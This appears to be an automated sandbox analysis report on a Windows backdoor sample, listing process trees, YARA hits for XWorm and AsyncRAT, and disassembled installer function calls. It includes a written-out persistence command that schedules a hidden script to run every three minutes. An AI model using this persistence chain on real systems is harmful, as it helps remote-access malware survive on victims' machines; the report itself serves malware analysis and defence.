Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:38:11
Start date:	29/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:38:11
Start date:	29/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:38:11
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Imagebase:	0x7a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:38:11
Start date:	29/03/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Imagebase:	0x7ff6613d0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:38:12
Start date:	29/03/2024
Path:	C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Imagebase:	0x440000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 1%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:38:24
Start date:	29/03/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Imagebase:	0x7ff6613d0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:38:25
Start date:	29/03/2024
Path:	C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Imagebase:	0x440000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	13:10:27
Start date:	29/03/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Imagebase:	0x1b0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	13:10:27
Start date:	29/03/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Imagebase:	0xa50000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	13:10:36
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068
Imagebase:	0xed0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	13:11:00
Start date:	29/03/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Imagebase:	0x7ff6613d0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: EcoScape.pifPID: 5580, Parent PID: 5112

General

Target ID:	39
Start time:	13:11:01
Start date:	29/03/2024
Path:	C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Imagebase:	0x440000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	13:11:07
Start date:	29/03/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff7726e0000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	13:11:07
Start date:	29/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.7%
Total number of Nodes:	1355
Total number of Limit Nodes:	19

Executed Functions

Function 0040350A Relevance: 88.0, APIs: 34, Strings: 16, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 0040352D
GetVersionExW.KERNEL32(?), ref: 00403556
GetVersionExW.KERNEL32(0000011C), ref: 0040356D
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
OleInitialize.OLE32(00000000), ref: 00403647
SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe",00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe",00000000), ref: 004036B3
GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,?), ref: 004037E6
GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004037F7
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403803
GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403817
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040381F
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403830
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403838
DeleteFileW.KERNELBASE(1033), ref: 0040384C
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu), ref: 00403933
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C), ref: 00403942

Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00405ACE

lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp), ref: 0040394D
lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe",00000000,?), ref: 00403959
SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403979
DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,0079F708,00000001), ref: 004039EB
CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000), ref: 00403A18
ExitProcess.KERNEL32(?), ref: 00403A36
OleUninitialize.OLE32(?), ref: 00403A3B
ExitProcess.KERNEL32 ref: 00403A55
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AC8
ExitProcess.KERNEL32 ref: 00403AE9

Strings

"C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe", xrefs: 00403680, 00403686, 0040369B, 00403872, 0040387E, 004038CC, 004038D6
Error launching installer, xrefs: 004038DC
~nsu, xrefs: 0040392B
1033, xrefs: 00403847
TMP, xrefs: 00403833
\Temp, xrefs: 004037FD
Low, xrefs: 00403819
C:\Users\user\Desktop, xrefs: 00403952, 00403957, 0040398A
NSIS Error, xrefs: 0040366B
.tmp, xrefs: 00403947
UXTHEME, xrefs: 004035F8, 004035FD, 00403603
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004037DB, 004037E0, 004037F6, 00403802, 00403811, 0040381E, 0040382A, 00403832, 00403930, 00403941, 0040394C, 00403958, 00403969, 00403978, 00403A2E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00403905
SeShutdownPrivilege, xrefs: 00403A7E
C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe, xrefs: 004039E6
TEMP, xrefs: 0040382B

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-3962130039
Opcode ID: cae39c1e9e6ca513e479b9447da8aa631f95b308384d32b1bc95edec7b3108ac
Instruction ID: 53a60b58fdbd25313d51bce5ca3a2b86b24fade18f433b590921527e5da6acff
Opcode Fuzzy Hash: cae39c1e9e6ca513e479b9447da8aa631f95b308384d32b1bc95edec7b3108ac
Instruction Fuzzy Hash: B2E1F8B0A00214ABD720AFB59D45ABF3AB8EB45705F10807EF581B62D1DB7C8B41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403BC9 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914

GetUserDefaultUILanguage.KERNELBASE(00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,00000000,?), ref: 00403BE3

Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E

lstrcatW.KERNEL32(1033,007A1F48), ref: 00403C4A
lstrlenW.KERNEL32(open cmd,?,?,?,open cmd,00000000,007B3800,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,771B3420), ref: 00403CCA
lstrcmpiW.KERNEL32(?,.exe,open cmd,?,?,?,open cmd,00000000,007B3800,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
GetFileAttributesW.KERNEL32(open cmd,?,00000000,?), ref: 00403CE8
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00403D31
RegisterClassW.USER32(007A7A00), ref: 00403D6E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D86
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DBB
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DF1
GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403E1D
GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403E2A
RegisterClassW.USER32(007A7A00), ref: 00403E33
DialogBoxParamW.USER32(?,00000000,00403F77,00000000), ref: 00403E52

Strings

_Nb, xrefs: 00403D4D, 00403DB5
.exe, xrefs: 00403CD7
open cmd, xrefs: 00403C91, 00403C9A, 00403CA8, 00403CF7, 00403CFD
RichEd32, xrefs: 00403E05
.DEFAULT\Control Panel\International, xrefs: 00403C35
Control Panel\Desktop\ResourceLocale, xrefs: 00403BFD
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403BCE
1033, xrefs: 00403BE9, 00403C45
RichEdit, xrefs: 00403E24
RichEdit20W, xrefs: 00403E15, 00403E1B
RichEd20, xrefs: 00403DF7

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$open cmd
API String ID: 606308-2950417684
Opcode ID: a421e183573b9f452b9ca09e15ef6a2d82480133861b32aad243b677c75c9e6c
Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
Opcode Fuzzy Hash: a421e183573b9f452b9ca09e15ef6a2d82480133861b32aad243b677c75c9e6c
Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,00000400,?,?,?,?,?,0040385A,?), ref: 004030AA

Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003,?,?,?,?,?,0040385A), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,Z8@,?,?,?,?,?,0040385A,?), ref: 0040322C

Strings

soft, xrefs: 0040316B
Inst, xrefs: 00403162
Error launching installer, xrefs: 004030CD
Null, xrefs: 00403174
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403084
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
C:\Users\user\Desktop, xrefs: 004030D8, 004030DD, 004030E3
C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
Z8@, xrefs: 00403227, 00403242

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Z8@$soft
API String ID: 2803837635-4173278297
Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406557 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(open cmd,00000400), ref: 00406672
GetWindowsDirectoryW.KERNEL32(open cmd,00000400,00000000,007A0F28,?,004055B3,007A0F28,00000000,00000000,0079DF00,771B23A0), ref: 00406685
lstrcatW.KERNEL32(open cmd,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
lstrlenW.KERNEL32(open cmd,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756

Strings

open cmd, xrefs: 00406581, 00406634, 0040663B, 0040663F, 0040665C, 00406671, 00406684, 00406699, 004066C6, 004066FB, 00406701, 0040671E, 00406731, 0040674F, 00406755, 0040675E, 00406794
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406640
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004066F6

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$open cmd
API String ID: 4260037668-4218211737
Opcode ID: 96fea232bba9f539859174344ba2078cdcaa49a508c9a356705917328f4b5d31
Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
Opcode Fuzzy Hash: 96fea232bba9f539859174344ba2078cdcaa49a508c9a356705917328f4b5d31
Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017D5

Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527

Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079DF00,771B23A0,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079DF00,771B23A0,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
Part of subcall function 0040557C: lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
Part of subcall function 0040557C: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637

Strings

open cmd, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 0040179E
open, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
